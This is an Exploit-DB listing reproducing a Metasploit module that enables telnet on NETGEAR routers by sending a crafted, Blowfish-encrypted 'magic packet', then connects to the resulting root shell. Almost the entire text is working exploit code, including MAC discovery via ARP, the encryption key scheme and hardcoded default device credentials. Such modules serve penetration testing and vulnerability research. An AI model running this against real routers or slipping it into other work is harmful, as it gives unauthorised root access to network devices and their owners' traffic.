NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)

EDB-ID: 44245
Author: Metasploit
Published: 2018-03-05
CVE: N/A
Type: Remote
Platform: Hardware
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 # This module requires Metasploit: https://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Capture

def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR TelnetEnable',
'Description' => %q{
This module sends a magic packet to a NETGEAR device to enable telnetd.
Upon successful connect, a root shell should be presented to the user.
},
'Author' => [
'Paul Gebheim', # Python PoC (TCP)
'insanid', # Python PoC (UDP)
'wvu', # Metasploit module
],
'References' => [
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
['URL', 'https://github.com/insanid/netgear-telenetenable']
],
'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))

register_options([
Opt::RPORT(23),
OptString.new('MAC', [false, 'MAC address of device']),
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end

def check
# Run through protocol detection
detect_proto

# This is a gamble, but it's the closest we can get
if @proto == :tcp
CheckCode::Detected
else
CheckCode::Unknown
end
end

def exploit
# Try to do the exploit unless telnetd is detected
@do_exploit = true

# Detect TCP or UDP and presence of telnetd
@proto = target[:proto]
detect_proto if @proto == :auto

# Use supplied or ARP-cached MAC address
configure_mac if @do_exploit

# Use supplied or default creds
configure_creds if @do_exploit

# Shell it
exploit_telnetenabled if @do_exploit
connect_telnetd
end

def detect_proto
begin
connect

res = begin
sock.get_once || ''
rescue EOFError
''
end

# telnetenabled returns no data, unlike telnetd
if res.length == 0
print_good('Detected telnetenabled on TCP')
else
print_good('Detected telnetd on TCP')
@do_exploit = false
end

@proto = :tcp
# It's UDP... and we may not get an ICMP error...
rescue Rex::ConnectionError
print_good('Detected telnetenabled on UDP')
@proto = :udp
ensure
disconnect
end
end

def configure_mac
@mac = datastore['MAC']

return if @mac

print_status('Attempting to discover MAC address via ARP')

begin
open_pcap
@mac = lookup_eth(rhost).first
rescue RuntimeError
fail_with(Failure::BadConfig, 'Superuser access required')
ensure
close_pcap
end

if @mac
print_good("Found MAC address #{@mac}")
else
fail_with(Failure::Unknown, 'Could not find MAC address')
end
end

def configure_creds
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]

# Try to use default creds if no creds were found
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end

print_good("Using creds #{@username}:#{@password}")
end

def exploit_telnetenabled
print_status('Generating magic packet')
payload = magic_packet(@mac, @username, @password)

begin
print_status("Connecting to telnetenabled via #{@proto.upcase}")
@proto == :tcp ? connect : connect_udp
print_status('Sending magic packet')
@proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
rescue Rex::ConnectionError
fail_with(Failure::Disconnected, 'Something happened mid-connection!')
ensure
print_status('Disconnecting from telnetenabled')
@proto == :tcp ? disconnect : disconnect_udp
end

# Wait a couple seconds for telnetd to come up
print_status('Waiting for telnetd')
sleep(2)
end

def connect_telnetd
print_status('Connecting to telnetd')
connect
handler(sock)
end

# NOTE: This is almost a verbatim copy of the Python PoC
def magic_packet(mac, username, password)
mac = mac.gsub(/[:-]/, '').upcase

if mac.length != 12
fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
end
just_mac = mac.ljust(0x10, "\x00")

if username.length > 0x10
fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
end
just_username = username.ljust(0x10, "\x00")

if @proto == :tcp
if password.length > 0x10
fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
end
just_password = password.ljust(0x10, "\x00")
elsif @proto == :udp
# Thanks to Roberto Frenna for the reserved field analysis
if password.length > 0x21
fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
end
just_password = password.ljust(0x21, "\x00")
end

cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = Rex::Text.md5_raw(cleartext)

payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))

secret_key = 'AMBIT_TELNET_ENABLE+' + password

byte_swap(blowfish_encrypt(secret_key, payload))
end

def blowfish_encrypt(secret_key, payload)
cipher = OpenSSL::Cipher.new('bf-ecb').encrypt

cipher.padding = 0
cipher.key_len = secret_key.length
cipher.key = secret_key

cipher.update(payload) + cipher.final
end

def byte_swap(data)
data.unpack('N*').pack('V*')
end

end

Related Posts